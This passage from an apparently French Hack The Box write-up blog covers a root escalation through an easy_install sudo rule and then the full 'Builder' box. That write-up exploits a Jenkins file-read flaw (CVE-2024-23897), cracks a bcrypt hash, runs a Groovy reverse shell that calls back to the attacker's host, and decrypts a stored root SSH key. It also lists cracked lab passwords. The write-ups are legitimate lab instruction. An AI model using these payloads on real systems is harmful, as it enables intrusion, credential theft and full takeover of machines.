-&gt; root </h2><h3 id="easy_install-as-root">easy_install as root </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">developer@updown:~$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> developer on localhost: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User developer may run the following commands on localhost: </span></span><span class="line"><span class="cl"> <span class="o">(</span>ALL<span class="o">)</span> NOPASSWD: /usr/local/bin/easy_install </span></span></code></pre></td></tr></table> </div> </div><p>Sur GTFObins, on trouve un chemin d&rsquo;exploitation pour passer root:<br> <a class="link" href="https://gtfobins.github.io/gtfobins/easy_install/" target="_blank" rel="noopener" >https://gtfobins.github.io/gtfobins/easy_install/</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nv">TF</span><span class="o">=</span><span class="k">$(</span>mktemp -d<span class="k">)</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;import os; os.execl(&#39;/bin/sh&#39;, &#39;sh&#39;, &#39;-c&#39;, &#39;sh &lt;</span><span class="k">$(</span>tty<span class="k">)</span><span class="s2"> &gt;</span><span class="k">$(</span>tty<span class="k">)</span><span class="s2"> 2&gt;</span><span class="k">$(</span>tty<span class="k">)</span><span class="s2">&#39;)&#34;</span> &gt; <span class="nv">$TF</span>/setup.py </span></span><span class="line"><span class="cl">sudo easy_install <span class="nv">$TF</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">developer@updown:/tmp$ <span class="nv">TF</span><span class="o">=</span><span class="k">$(</span>mktemp -d<span class="k">)</span> </span></span><span class="line"><span class="cl">developer@updown:/tmp$ <span class="nb">echo</span> <span class="s2">&#34;import os; os.execl(&#39;/bin/sh&#39;, &#39;sh&#39;, &#39;-c&#39;, &#39;sh &lt;</span><span class="k">$(</span>tty<span class="k">)</span><span class="s2"> &gt;</span><span class="k">$(</span>tty<span class="k">)</span><span class="s2"> 2&gt;</span><span class="k">$(</span>tty<span class="k">)</span><span class="s2">&#39;)&#34;</span> &gt; <span class="nv">$TF</span>/setup.py </span></span><span class="line"><span class="cl">developer@updown:/tmp$ sudo easy_install <span class="nv">$TF</span> </span></span><span class="line"><span class="cl">WARNING: The easy_install <span class="nb">command</span> is deprecated and will be removed in a future version. </span></span><span class="line"><span class="cl">Processing tmp.hlSwiYYkel </span></span><span class="line"><span class="cl">Writing /tmp/tmp.hlSwiYYkel/setup.cfg </span></span><span class="line"><span class="cl">Running setup.py -q bdist_egg --dist-dir /tmp/tmp.hlSwiYYkel/egg-dist-tmp-KNZfWR </span></span><span class="line"><span class="cl"><span class="c1"># whoami</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1"># cat /root/root.txt </span> </span></span><span class="line"><span class="cl">7077....3986 </span></span></code></pre></td></tr></table> </div> </div><p>Il suffit de créer un dossier, avec un fichier setup.py expliquant comment notre module python doit s&rsquo;installer. On injecte un code malveillant dans ce fichier et il sera executer en tant que root lors du lancement de <strong>easy_install</strong>.</p>https://leopoldabgn.github.io/writeups/p/builder-htb/Sat, 25 Oct 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/builder-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Builder cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Builder</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.10</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">- jennifer : **princess** </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.10 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 3eea454bc5d16d6fe2d4d13b0a3da94f <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 64cc75de4ae6a5b473eb3f1bcfb4e394 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM </span></span><span class="line"><span class="cl">8080/tcp open http syn-ack ttl <span class="m">62</span> Jetty 10.0.18 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Dashboard <span class="o">[</span>Jenkins<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-robots.txt: <span class="m">1</span> disallowed entry </span></span><span class="line"><span class="cl"><span class="p">|</span>_/ </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span> http-open-proxy: Potentially OPEN proxy. </span></span><span class="line"><span class="cl"><span class="p">|</span>_Methods supported:CONNECTION </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Jetty<span class="o">(</span>10.0.18<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="jenkins-2441---port-8080">Jenkins 2.441 - port 8080 </h3><h3 id="local-file-inclusion---cve-2024-23897">Local File Inclusion - CVE-2024-23897 </h3><p>On trouve sur internet que Jenkins 2.441 est vulnérable à une LFI, permettant d&rsquo;accéder à n&rsquo;importe quel fichier sur la machine : <a class="link" href="https://www.exploit-db.com/exploits/51993" target="_blank" rel="noopener" >https://www.exploit-db.com/exploits/51993</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ python3 exploit.py -u http://10.10.11.10:8080 </span></span><span class="line"><span class="cl">Press Ctrl+C to <span class="nb">exit</span> </span></span><span class="line"><span class="cl">File to download: </span></span><span class="line"><span class="cl">&gt; /etc/hosts </span></span><span class="line"><span class="cl">ff02::1 ip6-allnodes </span></span><span class="line"><span class="cl">ff02::2 ip6-allrouters </span></span><span class="line"><span class="cl">172.17.0.2 0f52c222a4cc </span></span><span class="line"><span class="cl">::1 localhost ip6-localhost ip6-loopback </span></span><span class="line"><span class="cl">ff00::0 ip6-mcastprefix </span></span><span class="line"><span class="cl">127.0.0.1 localhost </span></span><span class="line"><span class="cl">fe00::0 ip6-localnet </span></span><span class="line"><span class="cl">File to download: </span></span><span class="line"><span class="cl">&gt; /etc/passwd </span></span><span class="line"><span class="cl">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin </span></span><span class="line"><span class="cl">root:x:0:0:root:/root:/bin/bash </span></span><span class="line"><span class="cl">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin </span></span><span class="line"><span class="cl">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin </span></span><span class="line"><span class="cl">_apt:x:42:65534::/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin </span></span><span class="line"><span class="cl">bin:x:2:2:bin:/bin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin </span></span><span class="line"><span class="cl">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin </span></span><span class="line"><span class="cl">jenkins:x:1000:1000::/var/jenkins_home:/bin/bash </span></span><span class="line"><span class="cl">games:x:5:60:games:/usr/games:/usr/sbin/nologin </span></span><span class="line"><span class="cl">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin </span></span><span class="line"><span class="cl">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">sys:x:3:3:sys:/dev:/usr/sbin/nologin </span></span><span class="line"><span class="cl">sync:x:4:65534:sync:/bin:/bin/sync </span></span></code></pre></td></tr></table> </div> </div><p>Dans le /etc/hosts, on trouve:</p> <blockquote> <p>172.17.0.2 0f52c222a4cc</p> </blockquote> <p>On en déduit que jenkins tourne dans un docker, au vu de l&rsquo;ip en 172 et du hostname en hexadecimal.</p> <p>Dans /etc/passwd, on trouve le dossier contenant les fichiers de Jenkins:</p> <blockquote> <p>jenkins:x:1000:1000::/var/jenkins_home:/bin/bash</p> </blockquote> <p>Toujours à l&rsquo;aide de la LFI, on tente de récupérer le fichier de configuration de Jenkins pour obtenir des credentials :</p> <blockquote> <p>/var/jenkins_home</p> </blockquote> <p>En cherchant sur internet, je comprends que chaque utilisateur à un fichier config.xml contenant probablement le hachage de leur mot de passe.</p> <blockquote> <p>/var/lib/jenkins/users/jenkins_[udid]/config.xml</p> </blockquote> <p>De plus, j&rsquo;ai télécharger la version de Jenkins 2.441 que j&rsquo;ai installé sur une machine virtuelle, afin de pouvoir observer correctement l&rsquo;arborescence des fichiers. Sur le dashboard de Jenkins, j&rsquo;ai trouvé le nom d&rsquo;utilisateur &ldquo;jennifer&rdquo; qui semble correspondre au compte administrateur.</p> <p>En regardant de plus près dans les fichiers de mon installation de Jenkins, j&rsquo;ai trouvé un fichier <strong>/var/lib/jenkins/users/users.xml</strong> contenant la liste des users et leur <strong>uid</strong>. En dumpant ce fichier, on trouve l&rsquo;uid de jennifer, et donc le nom du dossier:</p> <blockquote> <p>jennifer_12108429903186576833</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">&gt; /var/jenkins_home/users/users.xml </span></span><span class="line"><span class="cl">&lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s1">&#39;1.1&#39;</span> <span class="nv">encoding</span><span class="o">=</span><span class="s1">&#39;UTF-8&#39;</span>?&gt; </span></span><span class="line"><span class="cl"> &lt;string&gt;jennifer_12108429903186576833&lt;/string&gt; </span></span><span class="line"><span class="cl"> &lt;idToDirectoryNameMap <span class="nv">class</span><span class="o">=</span><span class="s2">&#34;concurrent-hash-map&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;entry&gt; </span></span><span class="line"><span class="cl"> &lt;string&gt;jennifer&lt;/string&gt; </span></span><span class="line"><span class="cl"> &lt;version&gt;1&lt;/version&gt; </span></span><span class="line"><span class="cl">&lt;/hudson.model.UserIdMapper&gt; </span></span><span class="line"><span class="cl"> &lt;/idToDirectoryNameMap&gt; </span></span><span class="line"><span class="cl">&lt;hudson.model.UserIdMapper&gt; </span></span><span class="line"><span class="cl"> &lt;/entry&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Enfin, je tente de récupérer le fichier <strong>config.xml</strong> de jennifer :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">File to download: </span></span><span class="line"><span class="cl">&gt; /var/jenkins_home/users/jennifer_12108429903186576833/config.xml </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">&lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s1">&#39;1.1&#39;</span> <span class="nv">encoding</span><span class="o">=</span><span class="s1">&#39;UTF-8&#39;</span>?&gt; </span></span><span class="line"><span class="cl"> &lt;fullName&gt;jennifer&lt;/fullName&gt; </span></span><span class="line"><span class="cl"> &lt;seed&gt;6841d11dc1de101d&lt;/seed&gt; </span></span><span class="line"><span class="cl"> &lt;id&gt;jennifer&lt;/id&gt; </span></span><span class="line"><span class="cl"> &lt;version&gt;10&lt;/version&gt; </span></span><span class="line"><span class="cl"> &lt;tokenStore&gt; </span></span><span class="line"><span class="cl"> &lt;filterExecutors&gt;false&lt;/filterExecutors&gt; </span></span><span class="line"><span class="cl"> &lt;io.jenkins.plugins.thememanager.ThemeUserProperty <span class="nv">plugin</span><span class="o">=</span><span class="s2">&#34;theme-manager@215.vc1ff18d67920&#34;</span>/&gt; </span></span><span class="line"><span class="cl"> &lt;passwordHash&gt;#jbcrypt:<span class="nv">$2</span>a<span class="nv">$10$UwR7BpEH</span>.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a&lt;/passwordHash&gt; </span></span></code></pre></td></tr></table> </div> </div><p>J&rsquo;ai obtenu le hachage de jennifer sur lequel j&rsquo;ai pu effectuer une attaque par dictionnaire avec la liste rockyou.txt :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ hashcat -m <span class="m">3200</span> hash.txt ~/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl"><span class="nv">$2</span>a<span class="nv">$10$UwR7BpEH</span>.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a:princess </span></span></code></pre></td></tr></table> </div> </div><p>On obtient finalement les credentials de <strong>jennifer</strong> nous permettant d&rsquo;obtenir un accès administrateur sur l&rsquo;interface web de Jenkins :</p> <ul> <li>jennifer : <strong>princess</strong></li> </ul> <h3 id="jenkins-reverse-shell">Jenkins Reverse Shell </h3><p>http://10.10.11.10:8080/manage/script</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">String <span class="nv">host</span><span class="o">=</span><span class="s2">&#34;10.10.14.11&#34;</span><span class="p">;</span>int <span class="nv">port</span><span class="o">=</span>1337<span class="p">;</span>String <span class="nv">cmd</span><span class="o">=</span><span class="s2">&#34;bash&#34;</span><span class="p">;</span>Process <span class="nv">p</span><span class="o">=</span>new ProcessBuilder<span class="o">(</span>cmd<span class="o">)</span>.redirectErrorStream<span class="o">(</span><span class="nb">true</span><span class="o">)</span>.start<span class="o">()</span><span class="p">;</span>Socket <span class="nv">s</span><span class="o">=</span>new Socket<span class="o">(</span>host,port<span class="o">)</span><span class="p">;</span>InputStream <span class="nv">pi</span><span class="o">=</span>p.getInputStream<span class="o">()</span>,pe<span class="o">=</span>p.getErrorStream<span class="o">()</span>, <span class="nv">si</span><span class="o">=</span>s.getInputStream<span class="o">()</span><span class="p">;</span>OutputStream <span class="nv">po</span><span class="o">=</span>p.getOutputStream<span class="o">()</span>,so<span class="o">=</span>s.getOutputStream<span class="o">()</span><span class="p">;</span><span class="k">while</span><span class="o">(</span>!s.isClosed<span class="o">()){</span><span class="k">while</span><span class="o">(</span>pi.available<span class="o">()</span>&gt;0<span class="o">)</span>so.write<span class="o">(</span>pi.read<span class="o">())</span><span class="p">;</span><span class="k">while</span><span class="o">(</span>pe.available<span class="o">()</span>&gt;0<span class="o">)</span>so.write<span class="o">(</span>pe.read<span class="o">())</span><span class="p">;</span><span class="k">while</span><span class="o">(</span>si.available<span class="o">()</span>&gt;0<span class="o">)</span>po.write<span class="o">(</span>si.read<span class="o">())</span><span class="p">;</span>so.flush<span class="o">()</span><span class="p">;</span>po.flush<span class="o">()</span><span class="p">;</span>Thread.sleep<span class="o">(</span>50<span class="o">)</span><span class="p">;</span>try <span class="o">{</span>p.exitValue<span class="o">()</span><span class="p">;</span>break<span class="p">;</span><span class="o">}</span>catch <span class="o">(</span>Exception e<span class="o">){}}</span><span class="p">;</span>p.destroy<span class="o">()</span><span class="p">;</span>s.close<span class="o">()</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::1337 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:1337 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.10. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.10:34418. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">cat /var/jenkins_home/user.txt </span></span><span class="line"><span class="cl">7712.....64b9 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="root---ssh-private-key">Root - SSH Private Key </h3><p><a class="link" href="https://devops.stackexchange.com/questions/2191/how-to-decrypt-jenkins-passwords-from-credentials-xml" target="_blank" rel="noopener" >https://devops.stackexchange.com/questions/2191/how-to-decrypt-jenkins-passwords-from-credentials-xml</a></p> <p>On trouve un fichier <strong>credentials.xml</strong> contenant un secret chiffré :</p> <p><code>/var/jenkins_home/credentials.xml</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">&lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s1">&#39;1.1&#39;</span> <span class="nv">encoding</span><span class="o">=</span><span class="s1">&#39;UTF-8&#39;</span>?&gt; </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">&lt;com.cloudbees.plugins.credentials.SystemCredentialsProvider <span class="nv">plugin</span><span class="o">=</span><span class="s2">&#34;credentials@1319.v7eb_51b_3a_c97b_&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;java.util.concurrent.CopyOnWriteArrayList&gt; </span></span><span class="line"><span class="cl"> &lt;privateKey&gt;<span class="o">{</span>AQAAABAAAAowLrfCrZx9baWliwrtC...........HaB1OTIcTxtaaMR8IMMaKSM<span class="o">=}</span>&lt;/privateKey&gt; </span></span><span class="line"><span class="cl"> &lt;/privateKeySource&gt; </span></span><span class="line"><span class="cl"> &lt;username&gt;root&lt;/username&gt; </span></span><span class="line"><span class="cl"> &lt;usernameSecret&gt;false&lt;/usernameSecret&gt; </span></span><span class="line"><span class="cl"> &lt;/com.cloudbees.plugins.credentials.domains.Domain&gt; </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>Après quelques recherches sur le web, on comprend que les informations contenus dans ce fichier correspondent à des mots de passe ou clés SSH chiffrés, associés à des utilisateurs. Sur l&rsquo;interface graphique de Jenkins, on observe qu&rsquo;une clé SSH semble enregistrée pour un utilisateur <strong>root</strong>.</p> <p>Sur un forum en ligne, on nous explique que le secret dans la balise &ldquo;<privateKey>&rdquo; du fichier <code>credentials.xml</code> peut etre déchiffré en se rendant dans la console disponible sur la GUI : http://10.10.11.10:8080/script</p> <p>Il suffit alors d&rsquo;executer la commande suivante :</p> <blockquote> <p>println(hudson.util.Secret.decrypt(&quot;{PRIVATE_KEY}&quot;))</p> </blockquote> <p>Ce qui nous donne :</p> <blockquote> <p>println(hudson.util.Secret.decrypt(&quot;{AQAAABAAAAo&hellip;IcTxtaaMR8IMMaKSM=}&quot;))</p> </blockquote> <p>Sur le screenshot, on observe l&rsquo;execution du script qui nous permet de récupérer une clé privée SSH :</p> <p><img src="https://leopoldabgn.github.io/writeups/p/builder-htb/image.png" width="1272" height="1713" srcset="https://leopoldabgn.github.io/writeups/p/builder-htb/image_hu_309fe7e494881cde.png 480w, https://leopoldabgn.github.io/writeups/p/builder-htb/image_hu_c45732d5af91b453.png 1024w" loading="lazy" alt="Script Console - SSH Private Key Decrypt" class="gallery-image" data-flex-grow="74" data-flex-basis="178px" ></p> <h3 id="ssh-as-root">SSH as root </h3><p>A l&rsquo;aide de la clé SSH, on se connecte directement en tant que <strong>root</strong> sur la machine :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ vim root.key </span></span><span class="line"><span class="cl">$ chmod <span class="m">600</span> root.key </span></span><span class="line"><span class="cl">$ ssh root@10.10.11.10 -i root.key </span></span><span class="line"><span class="cl">Welcome to Ubuntu 22.04.3 LTS <span class="o">(</span>GNU/Linux 5.15.0-94-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Last login: Mon Feb <span class="m">12</span> 13:15:44 <span class="m">2024</span> from 10.10.14.40 </span></span><span class="line"><span class="cl">root@builder:~# ls </span></span><span class="line"><span class="cl">root.txt </span></span><span class="line"><span class="cl">root@builder:~# cat root.txt </span></span><span class="line"><span class="cl">a9aa.....0396 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/linkvortex-htb/Wed, 22 Oct 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/linkvortex-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Linkvortex cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linkvortex</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.47</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># Ghost application</span> </span></span><span class="line"><span class="cl">admin@linkvortex.com : OctopiFociPilfer45 </span></span><span class="line"><span class="cl"><span class="c1"># SSH</span> </span></span><span class="line"><span class="cl">bob : fibber-talented-worth </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" 